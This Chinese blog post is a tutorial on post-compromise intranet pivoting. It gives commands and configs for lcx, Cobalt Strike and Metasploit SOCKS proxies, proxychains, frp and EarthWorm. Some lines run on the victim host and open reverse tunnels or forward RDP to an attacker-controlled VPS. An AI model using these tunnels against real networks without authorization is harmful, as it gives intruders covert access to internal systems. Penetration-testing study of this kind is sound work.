内网代理转发

最新推荐文章于 2024-05-26 12:43:54 发布
最新推荐文章于 2024-05-26 12:43:54 发布
阅读量1.3k 收藏 6
点赞数 7
分类专栏: 内网 文章标签: 网络安全 windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55751267/article/details/128003023
版权

内网代理转发

针对于进入外网服务器后无法访问不通外网的内网服务器资源的技巧 并不是直接横向移动

环境:

win7(PC1)通外网 IP:192.168.93.20

win7(PC2)不通外网通PC1 IP:192.168.93.40

1、lcx端口转发

该方法需要下载lck文件,建议去网上寻找

https://www.zhuguodong.com/xiazai/%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/LCX%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%98%A0%E5%B0%84.rar

使用方法

lcx.exe –listen 4444 5555	#将lck传上去后 公网vps上执行该命令 意思是4444端口启动监听并转发到5555端口上
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389	#内网主机执行将本地3389端口发送到公网4444
操作方面相较于其他比较简单
2、cs自带sock代理

这个我研究很久 最后才发现 他所代理出来的IP为cs启动的服务器IP 端口也在服务器上

例如你的cs服务器是192.168.1.100 被攻击机为192.168.1.101 启动代理之后你连接需要连接192.168.1.100+端口就可以代理到被攻击机

创建sock代理后,需要开启防火墙放行该端口

第一种: msf代理上线内网(也可以理解为软件自带代理上线,这种渗透测试工具一般都可以设置代理)
启动msf输入

setg Proxies socks4:192.168.175.200:9527
setg ReverseAllowProxy true

随后可以启动模块对目标进行扫描攻击等
攻击成功会在当前msf窗口反弹shell

第二种:proxychains代理将各种工具传入内网(常用)

只讲linux的 没有这个软件可以网上搜教程 kali自带

vim /etc/proxychains.conf
socks4 192.168.179.128 9527

设置代理后 proxychains 加你想要执行的服务

例如 proxychains firebox 启动浏览器之后可以访问内网web站点

3、openvpn

openvpn在我的使用理解下就是主要是访问内网资源,和内网交互

这种方法搭建很难很麻烦,基本可能是要目标开启rdp,因为我暂时没有找到windows命令行安装的方法

但是效果应该是最好的,可以使得当前客户机和内网直接交互

教程可以去网上自行寻找

4、frp内网穿透

项目地址 https://github.com/fatedier/frp/releases

介绍以下frp的文件

frps和frps.ini 都是服务端设置的 可以理解为放入被攻击机的文件

frpc和frpc.ini 都是客户端设置的 可以理解为放入攻击机的文件

我的配置文件如下 并且测试了成功上线

frpc.ini

[common]
server_addr = vps地址
server_port = 7000
authentication_method = token
token = admin@passwd2022	#vps所设置的密码

[web]
type = http
local_port = 80
custom_domains = vps地址           

frps.ini

[common]
bind_port = 7000
token=admin@passwd2022
vhost_http_port = 80

服务端运行 ./frps -c frps.ini

客户端运行 ./frpc -c frpc.ini

启动之后可以通过vps的80端口访问到客户端的80端口

5、EarthWorm

项目地址:https://github.com/idlefire/ew 内网大杀器 在复杂的网络环境下完成网络穿透

该项目地址讲的非常清楚 不过在这我还是举个例子方便理解

第一种 当目标有公网IP时 我们直接上传ew对应的版本 在上面执行

./ew -s ssocksd -l 8888

这样该服务器上就会启动一个 8888 端口的sock5代理

然后就是启动proxychains挂上代理访问内网 记得防火墙打开端口

第二种 当目标没有公网IP时 这是我们就需要一个我们自己的公网IP了

./ew -s rcsocks -l 1080 -e 8888	#这是在我们的公网vps上执行的  他的意思是将vps本地的1080端口的请求转发到8888端口
./ew -s rssocks -d 1.1.1.1 -e 8888	#这个时候我们在使用被攻击机将代理流量走入这台vps的8888端口就可以形成代理了 此处的1.1.1.1是我们的公网IP

随后还是一样的操作 proxychains 代理

这一条感觉很像cs的sock代理 可能区别就是一个sock4一个是sock5

6、cs 代理转发 部署VPN

这一条我在win10和win11测试发现不兼容不能生成 貌似已经没有更新了

win7可以生成 但是我没有找到合适的教程没有测试成功 感兴趣的可以去网上找一下测试一下

效果应该和openvpn差不都 都是直接和内网交互的 但是比openvpn简单

这些测试根据自己的实际情况来使用就行了

MentalityXt
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一段轻松代理实现端口转发、IP代理、端口代理
05-23
windwos系统 1.准备环境 对外服务器 193.112.224.83(公)172.16.32.87(内) 内网IP及端口 172.16.32.98:5432 同一私有网络,默认内网互通 实现外网访问193.112.224.83:5432时自动转发到172.16.32.98:5432 2.云服务器上做如下转发 相关参数说明: ************************************************************************************** 查看规则是否存在 ************************************************************************************** 删除规则 **************************************************************************************
代理转发简要介绍
mingyqf的博客
01-20 3730
代理转发 概念 网关 ​ 必须经过 ​ 用来进行路由转发的设备,网关的作用是让不同网段之间能够通信 代理 ​ 委托访问 ​ 无论代理后面挂了几台设备,都认为是从代理进行访问,对外只表现为代理一台。外部认为是与代理进行交互 代理与NAT的区别 Ⅰ 从应用上讲, NAT 设备是网络基础设备之一, 解决的是IP不足的问题,代理服务器则是更贴近具体应用,比如: 通过代理服务器进行”翻墙”, 另外像迅游这样的加速器, 也是使用代理服务器实现的 ​ Ⅱ 从底层实现上讲, NAT 是工作
2、OpenVPN搭建
最新发布
weixin_46371752的博客
05-26 3523
搭建OpenVPN,centos7搭建VPN,centos7部署OpenVPN,linux如何搭建VPN服务,cetnos7如何部署OpenVPN,centos7如何部署VPN服务
MSF内网穿透之端口转发
weixin_46686336的博客
11-09 283
内网穿透之端口映射
Windows 网络转发
Orangeric
02-28 571
Windows 做网络转发命令设置转发命令查看转发命令删除全部转发命令删除单挑转发命令参考站点 命令 工作中有用到网络转发,记录一下。后期如果拓展再做完善。 打开 cmd 或 powershell命令行 设置转发命令 netsh interface portproxy add v4tov4 listenport=30000 listenaddress=172.16.30.24 connectport=20000 connectaddress=123.123.123.123 listenport 本机监
我的内网渗透-代理转发(1)
h1825819493的博客
06-24 331
必须经过用来进行路由转发的设备,网关的作用是让不同网段之间能够通信委托访问无论代理后面挂了几台设备,都认为是从代理进行访问,对外只表现为代理一台。外部认为是与代理进行交互网络虫洞隧道是一个网络的虚拟路径,使得入口的数据能够穿越到隧道的出口进行通信。
内网内网转发】——http协议代理转发_reGeorg代理转发
weixin_45588247的博客
09-15 3137
01【内网内网转发】——http协议代理转发_reGeorg代理转发 文章目录01【内网内网转发】——http协议代理转发_reGeorg代理转发一、环境准备:二、工具:三、概念:四、学习目的:五、reGeorg介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP): 一、环境准备:   关闭靶机电脑的防火墙及病毒和威胁防护的实时防护。   开启内网主机的远程桌面。   在被控服务器windows2008上面安装IIS服务器。 二、工
nginx反向代理用做内网域名转发
01-10
将nginx反向代理服务器的80映射到外网IP的80,这样指向到公司外网IP的域名的HTTP请求就会发送到nginx反向代理服务器,利用nginx反向代理将不同域名的请求转发内网不同机器的端口,就起到了“根据域名自动转发到...
内网穿透 - 端口转发
04-25
"端口映射器.e"文件很可能是整个端口转发程序的主控模块,负责配置和管理不同的端口转发规则,使得内网服务可以通过公网访问。用户可能可以通过配置文件或界面来设定源端口、目标地址和端口等参数。 其他文件如...
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
socket文件代理转发程序
02-25
通过代理实现不能连接互联网的某台内网主机(内网客户端)通过代理向连接互联网的主机(内网客户端)传输文件(文件不能太大)功能,其中“内网客户端”和“外网目标端”为代理软件的测试程序,只需在代码Proxy.h中...
lcx.exe端口转发
04-16
lcx 转发
使用nginx正向代理实现内网域名转发过程解析
01-10
后来学习nginx,知道nginx可以实现正向代理实现域名转发。整体思路如下: 说明: 1、在阿里云上配置域名解析。例如OA.XXXX.COM,解析地址为内网地址172.31.101.36 2、172.31.101.36是vip地址,是由两台nginx配置...
http反向代理转发代理
3Q阿斌 php专栏
12-13 1256
点击查看全文 http://www.3qphp.com/2016/server_10/28.html 转载请注明:谷谷点程序 » http方向代理转发代理
内网转发工具的使用
热门推荐
谢公子的博客
11-27 1万+
目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理(Linux)​ Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 ...
利用个人电脑做代理转发进行app测试
叫我泽西哥好吗?(手动滑稽 ‾◡◝)
11-02 631
app有测试版,预发版和正式版,后台接口都使用的固定的域名。测试时连接wifi希望域名指向对应的测试服。一般有两种方案。 1.建测试wifi,通过wifi转发域名到测试服 ,这样有个问题,测试wifi路由器设备low,连测试wifi人多之后,反应慢,影响测试效率。 2.本地windows安装fiddler,配置hosts:测试服ip 测试服域名,app任意连接一个wifi,将网络设置为本地ip:...
端口转发1:通过MSF实现
da_chuan_chuan的博客
01-03 5504
文章目录前言一、生成MSF后门程序并上线二、使用portfwd实现端口转发1、端口转发前测试远程连接和数据库连接是否成功2、进行端口映射总结 前言 在内网渗透过程中,实现端口转发是十分重要的一步。如:我们要进行远程连接,但是它只允许内网主机连接;将内网访问的网站转发出来,实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决,我们可以把内网端口转发到出网的端口上,也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ,以Ubantu为VPS主机。这里为了 方便假设我
SSH反向代理转发内网msf
weixin_30835649的博客
08-03 650
前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来。 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:...
lck端口转发
HoYim
04-22 567
实验环境win2003 ip:192.168.189.141 win10 ip:192.168.189.1 当然前提要打开远程,关闭防火墙设备 在03命令行上输入lcx.exe -slave 192.168.189.1 4444 127.0.0.1 3389 内网主机的 3389 端口转发到具有公网ip主机的 4444 端口 打开win10在命令行输入lcx.exe –listen 4444 5...
java如何代理转发内网html
12-02
根据提供的引用内容,我们可以使用基于Netty的内网穿透工具SakuraFrp来代理转发内网HTML。具体步骤如下: 1.下载并安装SakuraFrp。 2.在SakuraFrp的配置文件中配置代理转发规则。例如,我们可以将内网服务器的8080端口映射到公网的80端口,从而实现内网HTML的代理转发。配置文件示例如下: ```ini [common] server_addr = x.x.x.x server_port = 7000 token = 12345678 [web] type = tcp local_ip = 127.0.0.1 local_port = 8080 remote_port = 80 ``` 其中,x.x.x.x为公网IP地址,token为连接密码。 3.启动SakuraFrp客户端,并连接到SakuraFrp服务器。 4.启动内网服务器,并在浏览器中输入公网IP地址即可访问内网HTML。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值